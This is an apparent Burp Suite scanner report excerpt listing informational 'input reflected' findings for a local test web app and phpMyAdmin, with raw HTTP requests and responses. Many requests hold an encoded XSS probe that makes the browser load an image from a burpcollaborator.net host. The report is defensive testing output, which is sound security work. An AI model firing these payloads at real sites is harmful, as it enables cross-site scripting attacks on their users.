GET /examplewebiste/vulnerabilities/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//gk4ja27a7703c1deprepgynqfhlc9ge46uulm8cw1%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 419
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//gk4ja27a7703c1deprepgynqfhlc9ge46uulm8cw1\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.194. http://localhost/examplewebiste/vulnerabilities/view_source.php [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_source.php

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//2qt5godwdt6pinj0vdkbmktcl3ryf2kqcg0dn3bs%5c56burpcollaborator.net'%3e/vulnerabilities/view_source.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 429
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//2qt5godwdt6pinj0vdkbmktcl3ryf2kqcg0dn3bs\56burpcollaborator.net'&gt;/vulnerabilities/view_source.php was not found on this server.</p>
...[SNIP]...
19.195. http://localhost/examplewebiste/vulnerabilities/view_source.php [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_source.php

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /examplewebiste/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//jtgmj5gdga96l4mhyunsp1wtokufijn7fx3uqlea%5c56burpcollaborator.net'%3e/view_source.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:53 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 418
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//jtgmj5gdga96l4mhyunsp1wtokufijn7fx3uqlea\56burpcollaborator.net'&gt;/view_source.php was not found on this server.</p>
...[SNIP]...
19.196. http://localhost/examplewebiste/vulnerabilities/view_source.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/view_source.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request 1

GET /examplewebiste/vulnerabilities/view_source.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f%2f0qr3gmdudr6niljyvbk9mital1rwf0koce08nzbo%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:06:50 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 434
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /examplewebiste/vulnerabilities/view_source.php/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//0qr3gmdudr6niljyvbk9mital1rwf0koce08nzbo\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.197. http://localhost/icons/small/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /icons/small/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /icons/smallo4r9e27531/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:17:12 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 305
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /icons/smallo4r9e27531/ was not found on this server.</p>
...[SNIP]...
19.198. http://localhost/phpmyadmin/doc/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/doc/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/docdzs9sh1330/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:17:12 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 308
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/docdzs9sh1330/ was not found on this server.</p>
...[SNIP]...
19.199. http://localhost/phpmyadmin/doc/html/search.html [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/doc/html/search.html

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/doc/html/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//ua8x0gxoxlqh2f3sf5436cd45vbqzhzdn5dt4lrbf0%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 419
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/doc/html/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//ua8x0gxoxlqh2f3sf5436cd45vbqzhzdn5dt4lrbf0\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.200. http://localhost/phpmyadmin/doc/html/search.html [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/doc/html/search.html

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//0pq3fmcucr5nhliyubj9lisak1qwenej2bszpmfa4%5c56burpcollaborator.net'%3e/doc/html/search.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 419
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//0pq3fmcucr5nhliyubj9lisak1qwenej2bszpmfa4\56burpcollaborator.net'&gt;/doc/html/search.html was not found on this server.</p>
...[SNIP]...
19.201. http://localhost/phpmyadmin/doc/html/search.html [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/doc/html/search.html

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//rzuupdmlmifercsp42t0v921us0noeoac22qzdq1f%5c56burpcollaborator.net'%3e/html/search.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 426
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//rzuupdmlmifercsp42t0v921us0noeoac22qzdq1f\56burpcollaborator.net'&gt;/html/search.html was not found on this server.</p>
...[SNIP]...
19.202. http://localhost/phpmyadmin/doc/html/search.html [URL path folder 3]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/doc/html/search.html

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/doc/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//im8lc49c9925e3fgrtgri0pshjneb5b1ztphm4es3%5c56burpcollaborator.net'%3e/search.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:18 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 425
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/doc/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//im8lc49c9925e3fgrtgri0pshjneb5b1ztphm4es3\56burpcollaborator.net'&gt;/search.html was not found on this server.</p>
...[SNIP]...
19.203. http://localhost/phpmyadmin/index.php [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

POST /phpmyadmin/index.php7ch2m92yob HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Content-Type: application/x-www-form-urlencoded
Content-Length: 153
Cookie: pma_lang=en; phpMyAdmin=1bg782nlrv2jgqql6iul04nac0

set_session=1bg782nlrv2jgqql6iul04nac0&pma_username=IRyDYmDn&pma_password=p9A%21a6t%21D6&server=1&target=index.php&lang=en&token=YV%2cge%5dj%243LyLHn*%7f

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:24:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 313
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/index.php7ch2m92yob was not found on this server.</p>
...[SNIP]...
19.204. http://localhost/phpmyadmin/index.php [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//gbvj12yay7r3314egr5p7yeq6hcc0314pwfkc72vr%5c56burpcollaborator.net'%3e/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 408
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//gbvj12yay7r3314egr5p7yeq6hcc0314pwfkc72vr\56burpcollaborator.net'&gt;/index.php was not found on this server.</p>
...[SNIP]...
19.205. http://localhost/phpmyadmin/index.php [db parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The value of the db request parameter is copied into the application's response.

Request 1

GET /phpmyadmin/index.php?db=wmgf3889su&table=&lang=en&token=.%5e.m%3fYGGHz9M*%24Fa&lang=en HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Cookie: pma_lang=en; phpMyAdmin=o4gqqj8cksmreut7dot66foa0j

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:19:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=r6egbqhebq3c8uqiqo8n6j564f; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:19:22 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:19:22 +0000
Set-Cookie: phpMyAdmin=r6egbqhebq3c8uqiqo8n6j564f; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=hchi6ior49fo3s35gve55nhkia; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14438
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
<![CDATA[
PMA_commonParams.setAll({common_query:"",opendb_url:"db_structure.php",lang:"en",server:"1",table:"",db:"wmgf3889su",token:"L#f!NPlyf;(=miP-",text_dir:"ltr",show_databases_navigation_as_tree:true,pma_text_default_tab:"Browse",pma_text_left_default_tab:"Structure",pma_text_left_default_tab2:false,LimitChars:"50",pft
...[SNIP]...
<input type="hidden" name="db" value="wmgf3889su" />
...[SNIP]...
<input type="hidden" name="db" value="wmgf3889su" />
...[SNIP]...
19.206. http://localhost/phpmyadmin/index.php [name of an arbitrarily supplied URL parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the application's response.

Request 1

GET /phpmyadmin/index.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f%2fshdv7e4m4jxf9daqm3b1dak2ctio6f7gv8lwfj67v%5c56burpcollaborator.net'%3e HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:21 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 419
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/index.php/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//shdv7e4m4jxf9daqm3b1dak2ctio6f7gv8lwfj67v\56burpcollaborator.net'&gt; was not found on this server.</p>
...[SNIP]...
19.207. http://localhost/phpmyadmin/index.php [table parameter]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/index.php

Issue detail

The value of the table request parameter is copied into the application's response.

Request 1

GET /phpmyadmin/index.php?db=&table=3qsbs0mdeb&lang=en&token=.%5e.m%3fYGGHz9M*%24Fa&lang=en HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Cookie: pma_lang=en; phpMyAdmin=o4gqqj8cksmreut7dot66foa0j

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:20:07 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=9ecie0859gvu0v2qf4gdmpuh6d; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:20:08 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:20:08 +0000
Set-Cookie: phpMyAdmin=9ecie0859gvu0v2qf4gdmpuh6d; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=v5dl5v7e01tb93odlp3hthbv1b; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14441
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
<![CDATA[
PMA_commonParams.setAll({common_query:"",opendb_url:"db_structure.php",lang:"en",server:"1",table:"3qsbs0mdeb",db:"",token:"wa(zzA0]mEw$v1)L",text_dir:"ltr",show_databases_navigation_as_tree:true,pma_text_default_tab:"Browse",pma_text_left_default_tab:"Structure",pma_text_left_default_tab2:false,LimitChars:"5
...[SNIP]...
<input type="hidden" name="table" value="3qsbs0mdeb" />
...[SNIP]...
<input type="hidden" name="table" value="3qsbs0mdeb" />
...[SNIP]...
19.208. http://localhost/phpmyadmin/js/ [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/jspdl71rxlne/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 307
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/jspdl71rxlne/ was not found on this server.</p>
...[SNIP]...
19.209. http://localhost/phpmyadmin/js/ajax.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/ajax.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/ajax.jshqgtlhzt2a HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:05 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/ajax.jshqgtlhzt2a was not found on this server.</p>
...[SNIP]...
19.210. http://localhost/phpmyadmin/js/ajax.js [URL path folder 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/ajax.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//b8keyxv5v2oy0w19dm2k4tbl3c97xyzrnjd7au0ip%5c56burpcollaborator.net'%3e/js/ajax.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 409
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//b8keyxv5v2oy0w19dm2k4tbl3c97xyzrnjd7au0ip\56burpcollaborator.net'&gt;/js/ajax.js was not found on this server.</p>
...[SNIP]...
19.211. http://localhost/phpmyadmin/js/ajax.js [URL path folder 2]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/ajax.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/jspn87gh2cg3/ajax.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:04 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 314
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/jspn87gh2cg3/ajax.js was not found on this server.</p>
...[SNIP]...
19.212. http://localhost/phpmyadmin/js/codemirror/addon/lint/sql-lint.js [URL path filename]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/codemirror/addon/lint/sql-lint.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/codemirror/addon/lint/sql-lint.jsceupy5vvch HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:19:51 GMT
